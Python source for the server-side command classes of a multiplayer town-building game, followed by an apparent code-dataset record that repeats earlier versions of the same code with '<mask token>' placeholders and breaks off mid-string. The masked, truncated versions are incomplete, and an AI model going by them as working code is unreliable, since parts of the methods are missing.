        # Only one building per tile.
        if self._tile in self.town.buildings:
            occupant = self.town.buildings[self._tile]
            self.check_result += (
                f"Can't build {self._building_name} : "
                f"{occupant.name} already built on {self._tile}"
            )

    def _do(self):
        new_building = BuildingFactory.create_building_by_name(self._building_name)
        self.town.set_building(new_building, self._tile)

    def __repr__(self):
        text = f"Build ServerCommand : {self._building_name} in {self._tile}"
        if not self.check_result:
            text += f"\n{self.check_result}"
        return text

    @classmethod
    def from_json_dict(cls, json_dict: dict) -> BuildCommand:
        """Rebuild from the JSON produced by ``to_json_dict``."""
        return cls(json_dict["tile"], json_dict["building_name"])

    def to_json_dict(self):
        json_dict = super().to_json_dict()
        json_dict.update(
            command="build",
            building_name=self._building_name,
            tile=self._tile,
        )
        return json_dict
class CollectResourceCommand(ServerCommand):
    """Harvest one item from a resource node on a given tile."""
    # Energy drained from the player for a successful harvest.
    ENERGY_COST = 30
    def __init__(self, tile: tuple, item: Item):
        ServerCommand.__init__(self)
        self._tile = tile
        self._item = item
    def _check(self):
        """Fail when the player can't act, the tile holds no resource, the
        transfer is invalid, or energy is insufficient."""
        player = self.town.get_player(self.client_id)
        AvailableCheck(player).check(self.check_result)
        if self._tile not in self.town.resources:
            self.check_result += "No resource in {}".format(self._tile)
            return
        resource = self.town.resources[self._tile]
        # Source is the resource node, destination is the player.
        TransactionCheck(resource, player, self._item).check(self.check_result)
        EnergyCheck(player, CollectResourceCommand.ENERGY_COST).check(self.check_result)
    def _do(self):
        # Move the item from the resource inventory into the player's and
        # pay the energy cost.
        player = self.town.get_player(self.client_id)
        player.inventory.add_item(self._item)
        resource = self.town.resources[self._tile]
        resource.inventory.remove_item(self._item)
        player.energy.value -= CollectResourceCommand.ENERGY_COST
    def __repr__(self):
        msg = "Collect Resource ServerCommand : {}".format(self._item)
        if not self.check_result:
            msg += "\n{}".format(self.check_result)
        return msg
    @classmethod
    def from_json_dict(cls, json_dict: dict) -> CollectResourceCommand:
        return cls(json_dict["tile"], Item.from_json_dict(json_dict["item"]))
    def to_json_dict(self) -> dict:
        json_dict = super().to_json_dict()
        json_dict["command"] = "collect"
        json_dict["tile"] = self._tile
        json_dict["item"] = self._item.to_json_dict()
        return json_dict
class BuildingProcessCommand(ServerCommand):
    """Run one production step of a building: consume its required item and
    produce its result item, charging the player the process energy."""
    def __init__(self, tile: tuple, building_process: BuildingProcess):
        ServerCommand.__init__(self)
        self._tile = tile
        self._building_process = building_process
    def _check(self):
        """Fail when the player can't act, the tile has no building, the
        building inventory can't supply/accept the items, or energy is low."""
        player = self.town.get_player(self.client_id)
        AvailableCheck(player).check(self.check_result)
        if self._tile not in self.town.buildings:
            self.check_result += "No building on {}".format(self._tile)
            return
        building = self.town.buildings[self._tile]
        # (fixed: removed a duplicate re-fetch of the player here)
        InventoryRemoveCheck(
            building.inventory, self._building_process.item_required
        ).check(self.check_result)
        InventoryAddCheck(building.inventory, self._building_process.item_result).check(
            self.check_result
        )
        EnergyCheck(player, self._building_process.energy_required).check(
            self.check_result
        )
    def _do(self):
        # Swap required item for result item inside the building inventory
        # and charge the player the process energy.
        building = self.town.buildings[self._tile]
        building.inventory.remove_item(self._building_process.item_required)
        building.inventory.add_item(self._building_process.item_result)
        player = self.town.get_player(self.client_id)
        player.energy.value -= self._building_process.energy_required
    def __repr__(self):
        msg = "BuildingProcessCommand ServerCommand {}".format(self._building_process)
        if not self.check_result:
            msg += "\n{}".format(self.check_result)
        return msg
    @classmethod
    def from_json_dict(cls, json_dict):
        """Rebuild from the JSON produced by ``to_json_dict``."""
        return cls(
            json_dict["tile"],
            BuildingProcess.from_json_dict(json_dict["building_process"]),
        )
    def to_json_dict(self):
        json_dict = super().to_json_dict()
        json_dict["command"] = "building_process"
        json_dict["tile"] = self._tile
        json_dict["building_process"] = self._building_process.to_json_dict()
        return json_dict
class BuyCommand(ServerCommand):
    """Buy one unit of an item from a building's stock: the item moves from
    the building inventory on ``tile`` into the issuing player's inventory."""
    def __init__(self, tile: tuple, transaction: BuildingTransaction):
        ServerCommand.__init__(self)
        self._tile = tile
        self._transaction = transaction
    def _check(self):
        # Guard first: without this, a missing building raised KeyError,
        # while sibling commands report the problem via check_result.
        if self._tile not in self.town.buildings:
            self.check_result += "No building on {}".format(self._tile)
            return
        building = self.town.buildings[self._tile]
        player = self.town.get_player(self.client_id)
        item = Item(self._transaction.item_name, 1)
        AvailableCheck(player).check(self.check_result)
        # Source is the building, destination is the player.
        TransactionCheck(building, player, item).check(self.check_result)
    def _do(self):
        item = Item(self._transaction.item_name, 1)
        building = self.town.buildings[self._tile]
        player = self.town.get_player(self.client_id)
        building.inventory.remove_item(item)
        player.inventory.add_item(item)
    def __repr__(self):
        msg = "BuyCommand ServerCommand {}".format(self._transaction.item_name)
        if not self.check_result:
            msg += "\n{}".format(self.check_result)
        return msg
    @classmethod
    def from_json_dict(cls, json_dict):
        """Rebuild from the JSON produced by ``to_json_dict``."""
        return cls(
            json_dict["tile"],
            BuildingTransaction.from_json_dict(json_dict["transaction"]),
        )
    def to_json_dict(self):
        json_dict = super().to_json_dict()
        json_dict["command"] = "buy"
        json_dict["tile"] = self._tile
        json_dict["transaction"] = self._transaction.to_json_dict()
        return json_dict
class SellCommand(ServerCommand):
    """Sell one unit of an item to a building: the item moves from the
    issuing player's inventory into the building inventory on ``tile``."""
    def __init__(self, tile: tuple, transaction: BuildingTransaction):
        ServerCommand.__init__(self)
        self._tile = tile
        self._transaction = transaction
    def _check(self):
        # Guard first: without this, a missing building raised KeyError,
        # while sibling commands report the problem via check_result.
        if self._tile not in self.town.buildings:
            self.check_result += "No building on {}".format(self._tile)
            return
        building = self.town.buildings[self._tile]
        player = self.town.get_player(self.client_id)
        item = Item(self._transaction.item_name, 1)
        AvailableCheck(player).check(self.check_result)
        # Source is the player, destination is the building.
        TransactionCheck(player, building, item).check(self.check_result)
    def _do(self):
        item = Item(self._transaction.item_name, 1)
        building = self.town.buildings[self._tile]
        player = self.town.get_player(self.client_id)
        building.inventory.add_item(item)
        player.inventory.remove_item(item)
    def __repr__(self):
        msg = "SellCommand ServerCommand {}".format(self._transaction.item_name)
        if not self.check_result:
            msg += "\n{}".format(self.check_result)
        return msg
    @classmethod
    def from_json_dict(cls, json_dict):
        """Rebuild from the JSON produced by ``to_json_dict``."""
        return cls(
            json_dict["tile"],
            BuildingTransaction.from_json_dict(json_dict["transaction"]),
        )
    def to_json_dict(self):
        json_dict = super().to_json_dict()
        json_dict["command"] = "sell"
        json_dict["tile"] = self._tile
        json_dict["transaction"] = self._transaction.to_json_dict()
        return json_dict
class BuildBuildingCommand(ServerCommand):
    """Spend an item from a building's stock on that building's construction."""
    # Energy drained from the player per construction action.
    ENERGY_COST = 20
    def __init__(self, tile: tuple, item: Item):
        ServerCommand.__init__(self)
        self._item = item
        self._tile = tile
    def _check(self):
        # NOTE(review): raises KeyError when no building is on the tile,
        # unlike sibling commands that report "No building on ..." via
        # check_result -- confirm whether callers guarantee the building.
        building = self.town.buildings[self._tile]
        player = self.town.get_player(self.client_id)
        AvailableCheck(player).check(self.check_result)
        EnergyCheck(player, BuildBuildingCommand.ENERGY_COST).check(self.check_result)
        # Source and destination are the same building -- presumably this
        # validates removing the item from its own stock; confirm
        # TransactionCheck semantics.
        TransactionCheck(building, building, self._item).check(self.check_result)
    def _do(self):
        # Move the item from the stock inventory to the construction
        # inventory and charge the player.
        building = self.town.buildings[self._tile]
        player = self.town.get_player(self.client_id)
        player.energy.value -= BuildBuildingCommand.ENERGY_COST
        building.inventory.remove_item(self._item)
        building.construction_inventory.add_item(self._item)
    def __repr__(self):
        msg = "Build Building ServerCommand {}".format(self._item)
        if not self.check_result:
            msg += "\n{}".format(self.check_result)
        return msg
    @classmethod
    def from_json_dict(cls, json_dict):
        return cls(json_dict["tile"], Item.from_json_dict(json_dict["item"]))
    def to_json_dict(self):
        json_dict = super().to_json_dict()
        json_dict["command"] = "build_building"
        json_dict["tile"] = self._tile
        json_dict["item"] = self._item.to_json_dict()
        return json_dict
class UpgradeBuildingCommand(ServerCommand):
    """Upgrade a building once its construction inventory is full."""
    def __init__(self, tile: tuple):
        ServerCommand.__init__(self)
        self._tile = tile
    def _check(self):
        # NOTE(review): raises KeyError when no building is on the tile,
        # unlike sibling commands that report via check_result -- confirm.
        building = self.town.buildings[self._tile]
        player = self.town.get_player(self.client_id)
        AvailableCheck(player).check(self.check_result)
        # Upgrading requires every construction material to be delivered.
        if not building.construction_inventory.is_full():
            self.check_result += "construction not finished"
    def _do(self):
        building = self.town.buildings[self._tile]
        building.upgrade()
    def __repr__(self):
        msg = "Upgrade Building ServerCommand {}".format(self._tile)
        if not self.check_result:
            msg += "\n{}".format(self.check_result)
        return msg
    @classmethod
    def from_json_dict(cls, json_dict):
        return cls(json_dict["tile"])
    def to_json_dict(self):
        json_dict = super().to_json_dict()
        json_dict["command"] = "upgrade_building"
        json_dict["tile"] = self._tile
        return json_dict
class SleepCommand(ServerCommand):
    """Put the issuing player to sleep so energy regenerates over time."""
    # Regeneration rate while sleeping inside a "cabane" (hut).
    ENERGY_REGEN_IN_HOUSE = 4
    # Regeneration rate while sleeping on open ground.
    ENERGY_REGEN_IN_GROUND = 2
    def __init__(self):
        ServerCommand.__init__(self)
    def _check(self):
        """Sleeping is allowed on open ground or inside a "cabane" only."""
        tile = self.town.get_player_tile(self.client_id)
        # Player not in building
        if tile in self.town.buildings and self.town.buildings[tile].name != "cabane":
            self.check_result += "Can't sleep in building"
    def _do(self):
        player = self.town.get_player(self.client_id)
        tile = self.town.get_player_tile(self.client_id)
        # Change player sprite
        player.status = "sleep"
        player.energy.regen = SleepCommand.ENERGY_REGEN_IN_GROUND
        # Change energy regeneration depending on where he sleeps
        if tile in self.town.buildings and self.town.buildings[tile].name == "cabane":
            player.energy.regen = SleepCommand.ENERGY_REGEN_IN_HOUSE
    def __repr__(self):
        msg = "Sleep command. Player id: {}".format(self.client_id)
        if not self.check_result:
            msg += "\n{}".format(self.check_result)
        return msg
    @classmethod
    def from_json_dict(cls, json_dict: dict) -> SleepCommand:
        return cls()
    def to_json_dict(self):
        json_dict = super().to_json_dict()
        json_dict["command"] = "sleep"
        return json_dict
class WakeUpCommand(ServerCommand):
    """Bring a sleeping player back to the idle state."""

    def __init__(self):
        ServerCommand.__init__(self)

    def _check(self):
        sleeper = self.town.get_player(self.client_id)
        # Probe the awake-state with a throwaway CheckResult: a passing
        # AwakenCheck means the player is already up, which is an error here.
        awake_probe = CheckResult()
        AwakenCheck(sleeper).check(awake_probe)
        if awake_probe:
            self.check_result += f"{sleeper.name} is already awake"

    def _do(self):
        sleeper = self.town.get_player(self.client_id)
        sleeper.status = "idle"
        sleeper.energy.reset_regen()

    def __repr__(self):
        text = f"Wake up command. Player id: {self.client_id}"
        if not self.check_result:
            text += f"\n{self.check_result}"
        return text

    @classmethod
    def from_json_dict(cls, json_dict: dict) -> WakeUpCommand:
        return cls()

    def to_json_dict(self):
        json_dict = super().to_json_dict()
        json_dict["command"] = "wakeup"
        return json_dict
class HelpPlayerCommand(ServerCommand):
    """Transfer some of the helper's energy into a downed player's health."""
    # Energy the helper spends per help action.
    ENERGY_TO_HELP = 20
    # Health the helped player receives per help action.
    HEALTH_TO_GIVE = 1
    def __init__(self, player_to_help_id):
        ServerCommand.__init__(self)
        self._player_to_help_id = player_to_help_id
    def _check(self):
        """Fail unless both players exist, share a tile, the helper has the
        energy, and the target actually needs help (failed AvailableCheck)."""
        player = self.town.get_player(self.client_id)
        AvailableCheck(player).check(self.check_result)
        # The two players id exists in the town ?
        if self.client_id not in self.town.players.keys():
            self.check_result += "Player {} does not exist".format(self.client_id)
            return
        if self._player_to_help_id not in self.town.players.keys():
            self.check_result += "Player {} does not exist".format(
                self._player_to_help_id
            )
            return
        # Check if the two players are in the same tile
        if self.town.get_player_tile(self.client_id) != self.town.get_player_tile(
            self._player_to_help_id
        ):
            self.check_result += "Players {} and {} are not in the same tile".format(
                self.client_id, self._player_to_help_id
            )
            return
        # Check if I have enough energy to help
        EnergyCheck(
            self.town.get_player(self.client_id), HelpPlayerCommand.ENERGY_TO_HELP
        ).check(self.check_result)
        # Check if patient doesn't have health
        # (a passing AvailableCheck means the target doesn't need help)
        is_alive_check = CheckResult()
        AvailableCheck(self.town.get_player(self._player_to_help_id)).check(
            is_alive_check
        )
        if is_alive_check:
            self.check_result += "{} has enough health to keep moving".format(
                self._player_to_help_id
            )
    def _do(self):
        # Helper pays energy; target gains health.
        player_helper = self.town.get_player(self.client_id)
        player_helper.energy.value -= HelpPlayerCommand.ENERGY_TO_HELP
        player_to_help = self.town.get_player(self._player_to_help_id)
        player_to_help.health.value += HelpPlayerCommand.HEALTH_TO_GIVE
    def __repr__(self):
        msg = "HelpPlayerCommand: try to help {}".format(self._player_to_help_id)
        if not self.check_result:
            msg += "\n{}".format(self.check_result)
        return msg
    @classmethod
    def from_json_dict(cls, json_dict: dict) -> HelpPlayerCommand:
        return cls(json_dict["player_to_help_id"])
    def to_json_dict(self):
        json_dict = super().to_json_dict()
        json_dict["command"] = "help"
        json_dict["player_to_help_id"] = self._player_to_help_id
        return json_dict
class CommandsFactory:
    """Deserialize podsixnet payloads into concrete ServerCommand objects."""

    # Maps the wire-level "command" field to the class that handles it.
    COMMANDS_DICT = {
        "move": MovePlayerCommand,
        "build": BuildCommand,
        "collect": CollectResourceCommand,
        "building_process": BuildingProcessCommand,
        "buy": BuyCommand,
        "sell": SellCommand,
        "build_building": BuildBuildingCommand,
        "upgrade_building": UpgradeBuildingCommand,
        "help": HelpPlayerCommand,
        "sleep": SleepCommand,
        "wakeup": WakeUpCommand,
    }

    @staticmethod
    def from_podsixnet(podsixnet_dict):
        """Build the command named by ``podsixnet_dict["command"]`` and
        restore its client id and check result from the payload."""
        command_name = podsixnet_dict["command"]
        if command_name not in CommandsFactory.COMMANDS_DICT:
            raise NotImplementedError
        command = CommandsFactory.COMMANDS_DICT[command_name].from_json_dict(
            podsixnet_dict
        )
        command.client_id = podsixnet_dict["client_id"]
        command.check_result = CheckResult.from_json_dict(
            podsixnet_dict["check_result"]
        )
        return command
|
normal
|
{
"blob_id": "22b9868063d6c5fc3f8b08a6e725fff40f4a1a03",
"index": 3886,
"step-1": "<mask token>\n\n\nclass BuildCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_name: str):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_name = building_name\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass CollectResourceCommand(ServerCommand):\n ENERGY_COST = 30\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._tile = tile\n self._item = item\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.resources:\n self.check_result += 'No resource in {}'.format(self._tile)\n return\n resource = self.town.resources[self._tile]\n TransactionCheck(resource, player, self._item).check(self.check_result)\n EnergyCheck(player, CollectResourceCommand.ENERGY_COST).check(self.\n check_result)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.inventory.add_item(self._item)\n resource = self.town.resources[self._tile]\n resource.inventory.remove_item(self._item)\n player.energy.value -= CollectResourceCommand.ENERGY_COST\n\n def __repr__(self):\n msg = 'Collect Resource ServerCommand : {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->CollectResourceCommand:\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self) ->dict:\n json_dict = super().to_json_dict()\n json_dict['command'] = 'collect'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass BuildingProcessCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_process: BuildingProcess):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_process = building_process\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n 
AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.buildings:\n self.check_result += 'No building on {}'.format(self._tile)\n return\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n InventoryRemoveCheck(building.inventory, self._building_process.\n item_required).check(self.check_result)\n InventoryAddCheck(building.inventory, self._building_process.\n item_result).check(self.check_result)\n EnergyCheck(player, self._building_process.energy_required).check(self\n .check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.inventory.remove_item(self._building_process.item_required)\n building.inventory.add_item(self._building_process.item_result)\n player = self.town.get_player(self.client_id)\n player.energy.value -= self._building_process.energy_required\n\n def __repr__(self):\n msg = 'BuildingProcessCommand ServerCommand {}'.format(self.\n _building_process)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingProcess.from_json_dict(\n json_dict['building_process']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'building_process'\n json_dict['tile'] = self._tile\n json_dict['building_process'] = self._building_process.to_json_dict()\n return json_dict\n\n\nclass BuyCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(building, player, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building 
= self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.remove_item(item)\n player.inventory.add_item(item)\n\n def __repr__(self):\n msg = 'BuyCommand ServerCommand {}'.format(self._transaction.item_name)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'buy'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass SellCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(player, building, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.add_item(item)\n player.inventory.remove_item(item)\n\n def __repr__(self):\n msg = 'SellCommand ServerCommand {}'.format(self._transaction.item_name\n )\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sell'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass 
BuildBuildingCommand(ServerCommand):\n ENERGY_COST = 20\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._item = item\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n EnergyCheck(player, BuildBuildingCommand.ENERGY_COST).check(self.\n check_result)\n TransactionCheck(building, building, self._item).check(self.\n check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n player.energy.value -= BuildBuildingCommand.ENERGY_COST\n building.inventory.remove_item(self._item)\n building.construction_inventory.add_item(self._item)\n\n def __repr__(self):\n msg = 'Build Building ServerCommand {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'build_building'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass UpgradeBuildingCommand(ServerCommand):\n\n def __init__(self, tile: tuple):\n ServerCommand.__init__(self)\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if not building.construction_inventory.is_full():\n self.check_result += 'construction not finished'\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.upgrade()\n\n def __repr__(self):\n msg = 'Upgrade Building ServerCommand {}'.format(self._tile)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n 
return cls(json_dict['tile'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'upgrade_building'\n json_dict['tile'] = self._tile\n return json_dict\n\n\nclass SleepCommand(ServerCommand):\n ENERGY_REGEN_IN_HOUSE = 4\n ENERGY_REGEN_IN_GROUND = 2\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n tile = self.town.get_player_tile(self.client_id)\n if tile in self.town.buildings and self.town.buildings[tile\n ].name != 'cabane':\n self.check_result += \"Can't sleep in building\"\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n player.status = 'sleep'\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_GROUND\n if tile in self.town.buildings and self.town.buildings[tile\n ].name == 'cabane':\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_HOUSE\n\n def __repr__(self):\n msg = 'Sleep command. Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->SleepCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sleep'\n return json_dict\n\n\nclass WakeUpCommand(ServerCommand):\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n is_awaken_check = CheckResult()\n AwakenCheck(player).check(is_awaken_check)\n if is_awaken_check:\n self.check_result += '{} is already awake'.format(player.name)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.status = 'idle'\n player.energy.reset_regen()\n\n def __repr__(self):\n msg = 'Wake up command. 
Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->WakeUpCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'wakeup'\n return json_dict\n\n\nclass HelpPlayerCommand(ServerCommand):\n ENERGY_TO_HELP = 20\n HEALTH_TO_GIVE = 1\n\n def __init__(self, player_to_help_id):\n ServerCommand.__init__(self)\n self._player_to_help_id = player_to_help_id\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self.client_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n client_id)\n return\n if self._player_to_help_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n _player_to_help_id)\n return\n if self.town.get_player_tile(self.client_id\n ) != self.town.get_player_tile(self._player_to_help_id):\n self.check_result += ('Players {} and {} are not in the same tile'\n .format(self.client_id, self._player_to_help_id))\n return\n EnergyCheck(self.town.get_player(self.client_id), HelpPlayerCommand\n .ENERGY_TO_HELP).check(self.check_result)\n is_alive_check = CheckResult()\n AvailableCheck(self.town.get_player(self._player_to_help_id)).check(\n is_alive_check)\n if is_alive_check:\n self.check_result += '{} has enough health to keep moving'.format(\n self._player_to_help_id)\n\n def _do(self):\n player_helper = self.town.get_player(self.client_id)\n player_helper.energy.value -= HelpPlayerCommand.ENERGY_TO_HELP\n player_to_help = self.town.get_player(self._player_to_help_id)\n player_to_help.health.value += HelpPlayerCommand.HEALTH_TO_GIVE\n\n def __repr__(self):\n msg = 'HelpPlayerCommand: try to help {}'.format(self.\n _player_to_help_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return 
msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->HelpPlayerCommand:\n return cls(json_dict['player_to_help_id'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'help'\n json_dict['player_to_help_id'] = self._player_to_help_id\n return json_dict\n\n\nclass CommandsFactory:\n COMMANDS_DICT = {}\n COMMANDS_DICT['move'] = MovePlayerCommand\n COMMANDS_DICT['build'] = BuildCommand\n COMMANDS_DICT['collect'] = CollectResourceCommand\n COMMANDS_DICT['building_process'] = BuildingProcessCommand\n COMMANDS_DICT['buy'] = BuyCommand\n COMMANDS_DICT['sell'] = SellCommand\n COMMANDS_DICT['build_building'] = BuildBuildingCommand\n COMMANDS_DICT['upgrade_building'] = UpgradeBuildingCommand\n COMMANDS_DICT['help'] = HelpPlayerCommand\n COMMANDS_DICT['sleep'] = SleepCommand\n COMMANDS_DICT['wakeup'] = WakeUpCommand\n\n @staticmethod\n def from_podsixnet(podsixnet_dict):\n if podsixnet_dict['command'] in CommandsFactory.COMMANDS_DICT:\n command = CommandsFactory.COMMANDS_DICT[podsixnet_dict['command']\n ].from_json_dict(podsixnet_dict)\n else:\n raise NotImplementedError\n command.client_id = podsixnet_dict['client_id']\n command.check_result = CheckResult.from_json_dict(podsixnet_dict[\n 'check_result'])\n return command\n",
"step-2": "<mask token>\n\n\nclass BuildCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_name: str):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_name = building_name\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->BuildCommand:\n return cls(json_dict['tile'], json_dict['building_name'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'build'\n json_dict['building_name'] = self._building_name\n json_dict['tile'] = self._tile\n return json_dict\n\n\nclass CollectResourceCommand(ServerCommand):\n ENERGY_COST = 30\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._tile = tile\n self._item = item\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.resources:\n self.check_result += 'No resource in {}'.format(self._tile)\n return\n resource = self.town.resources[self._tile]\n TransactionCheck(resource, player, self._item).check(self.check_result)\n EnergyCheck(player, CollectResourceCommand.ENERGY_COST).check(self.\n check_result)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.inventory.add_item(self._item)\n resource = self.town.resources[self._tile]\n resource.inventory.remove_item(self._item)\n player.energy.value -= CollectResourceCommand.ENERGY_COST\n\n def __repr__(self):\n msg = 'Collect Resource ServerCommand : {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->CollectResourceCommand:\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self) ->dict:\n json_dict = super().to_json_dict()\n json_dict['command'] = 'collect'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n 
return json_dict\n\n\nclass BuildingProcessCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_process: BuildingProcess):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_process = building_process\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.buildings:\n self.check_result += 'No building on {}'.format(self._tile)\n return\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n InventoryRemoveCheck(building.inventory, self._building_process.\n item_required).check(self.check_result)\n InventoryAddCheck(building.inventory, self._building_process.\n item_result).check(self.check_result)\n EnergyCheck(player, self._building_process.energy_required).check(self\n .check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.inventory.remove_item(self._building_process.item_required)\n building.inventory.add_item(self._building_process.item_result)\n player = self.town.get_player(self.client_id)\n player.energy.value -= self._building_process.energy_required\n\n def __repr__(self):\n msg = 'BuildingProcessCommand ServerCommand {}'.format(self.\n _building_process)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingProcess.from_json_dict(\n json_dict['building_process']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'building_process'\n json_dict['tile'] = self._tile\n json_dict['building_process'] = self._building_process.to_json_dict()\n return json_dict\n\n\nclass BuyCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = 
